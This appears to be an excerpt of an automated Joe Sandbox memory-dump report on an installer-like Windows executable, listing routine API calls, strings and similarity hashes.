• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
• Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
• Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
• API String ID: 2238633743-1050967733
• Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
• Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
• API String ID: 667068680-222143506
• Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
• Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041B57E
                                                                                                                                        • GetDC.USER32(?), ref: 0041B58A
                                                                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 0041B626
Similarity
• API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
• String ID:
• API String ID: 2502006586-0
• Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
• Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
• Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
• GetDC.USER32(00000000), ref: 0041BDE9
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
• ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
• Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
• Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E766
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
• GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
• Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
• Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
• Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
• Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Strings
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
APIs
• RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: uu
• API String ID: 730355536-2249551878
APIs
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
• GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
• CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
Strings
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
Strings
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
Strings
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C52
• SaveDC.GDI32(?), ref: 00416C83
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
• RestoreDC.GDI32(?,?), ref: 00416D0B
• EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• String ID:
• API String ID: 3808407030-0
                                                                                                                                        • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                        • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                                                        • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                        • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
APIs
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
• Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
• Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
• Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
• Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
• Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
• Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
• GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
• GetDC.USER32(00000000), ref: 0041BC12
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
• DeleteObject.GDI32(00000000), ref: 0041BC9A
Similarity
• API ID: MetricsSystem$BitmapCreateDeleteObject
• String ID:
• API String ID: 1095203571-0
• Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
• Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
• Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
• Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
APIs
  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
• GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
Strings
• Failed to set permissions on registry key (%d)., xrefs: 0047368C
• Setting permissions on registry key: %s\%s, xrefs: 0047362A
• Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
• Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
• Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
• Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
• Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
• Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                                                        • String ID: vLB
                                                                                                                                        • API String ID: 1477829881-1797516613
                                                                                                                                        • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                        • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                                                        • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                        • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
• Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
• Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
• Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
• Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
• Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
• Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
• Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
• UnregisterClassA.USER32(?,00400000), ref: 004164AB
• RegisterClassA.USER32(?), ref: 004164CE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
• Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
• Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
• Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
• Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
• Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
• Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
• Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
APIs
